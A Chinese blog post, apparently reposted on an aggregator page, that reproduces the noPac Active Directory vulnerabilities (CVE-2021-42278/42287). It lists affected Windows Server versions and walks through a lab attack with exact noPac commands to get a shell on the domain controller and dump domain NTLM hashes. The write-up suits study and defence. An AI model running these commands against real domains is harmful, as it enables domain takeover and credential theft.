当前位置: 首页 > news >正文

h5网站建设公司百度seo泛解析代发排名

news 2026/4/7 6:44:03
h5网站建设公司,百度seo泛解析代发排名,网站做反向代理对百度收录有影响吗,建个私人网站怎么做漏洞介绍2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。CVE-2021-42278:是一个安全绕过漏洞,允许通过修改机器…

漏洞介绍

2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。

CVE-2021-42278:是一个安全绕过漏洞,允许通过修改机器账户的sAMAccountName属性来冒充域控制器。与标准用户相比,机器账户的名字以$结尾,但AD并没有验证域内机器账户中是否有$,导致机器账户可以被假冒。

CVE-2021-42287:是影响Kerberos特权属性证书(PAC)的安全绕过漏洞,允许通过假冒域控制器,使密钥分发中心KDC创建高权限票据。其配合 CVE-2021-42278 使用,创建与域控机器账户名字相同的机器账户(不以$结尾),账户请求一个TGT后,更名账户,然后通过S4U2self 申请TGS Ticket,接着域控在 TGS_REP 阶段,这个账户不存在的时候,DC会使用自己的密钥加密 TGS Ticket ,提供一个属于该账户的 PAC,然后我们就得到了一个高权限ST。

漏洞利用条件:

  • 已知域控ip

  • 已知域普通账号密码信息

影响范围

漏洞影响版本

CVE-2021-42287:

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)

  • Windows Server 2008 for 32-bit Systems Service Pack 2

  • Windows Server 2012

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows Server, version 2004 (Server Core installation)

  • Windows Server 2022 (Server Core installation)

  • Windows Server 2022

CVE-2021-42278:

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)

  • Windows Server 2008 for 32-bit Systems Service Pack 2

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows Server, version 2004 (Server Core installation)

  • Windows Server 2022 (Server Core installation)

  • Windows Server 2022

漏洞复现

环境:

  • win2016(192.168.10.2) 域控

  • win7(192.168.10.5),yuwin7 域普通用户

假设获取了域内普通用户yuwin7的账号密码,yuwin7 / yuwin7.com

工具:https://github.com/Ridter/noPac

  1. 漏洞检测

python scanner.py -use-ldap test.lab/yuwin7:yuwin7.com -dc-ip 192.168.10.2

如下,说明存在漏洞

  1. 直接获取域控shell

python noPac.py  -use-ldap test.lab/yuwin7:yuwin7.com -dc-ip 192.168.10.2 -shell

  1. 导出域内哈希

python noPac.py  -use-ldap test.lab/yuwin7:yuwin7.com -dc-ip 192.168.10.2 -dump -just-dc-ntlm
http://www.hkea.cn/news/333598/

相关文章:

  • jeecms做企业网站成都网站建设公司排名
  • 沈阳招聘网站开发地推项目平台
  • 798艺术区成都seo达人
  • 平度网站建设抖音代运营收费详细价格
  • 株洲网站优化找哪家seo优化的价格
  • 找印度人做网站sem竞价推广公司
  • 山西网站推广公司网站关键词优化怎么弄
  • 微信分销是什么重庆优化seo
  • 武汉企业网站推广方案永久免费无代码开发平台网站
  • 网站开发岗位群怎样推广产品
  • 桐城市美丽乡村建设专题网站石家庄整站优化技术
  • 北京建网站的公司哪个比较好郑州seo价格
  • 进空间的网站网络营销常见的工具
  • wordpress发文章的id怎么不连续如何做好搜索引擎优化工作
  • 交互式网站如何做seo推广软件排名
  • 西部建设网站惠州seo排名优化
  • 做环球资源网站有没有效果2024百度下载
  • 织梦 安装网站网站搭建需要多少钱
  • 做网站购买备案域名性价比高seo的排名优化
  • 潍坊中脉网站建设公司淄博seo公司
  • 深圳做网站推广哪家好青岛关键词优化平台
  • 呼和浩特市网站建设公司uc搜索引擎入口
  • 网站怎么做关键词搜索电子商务主要学什么内容
  • python做的网站漏洞百度竞价推广开户联系方式
  • 做任务换流量的网站怎么自己制作网页
  • 福清建设局网站火蝠电商代运营公司
  • 爱玖货源站在线智能识图
  • 上海网络营销软件windows优化大师win10
  • 专做美妆的视频网站ui设计
  • 平度市建设局网站济宁百度推广价格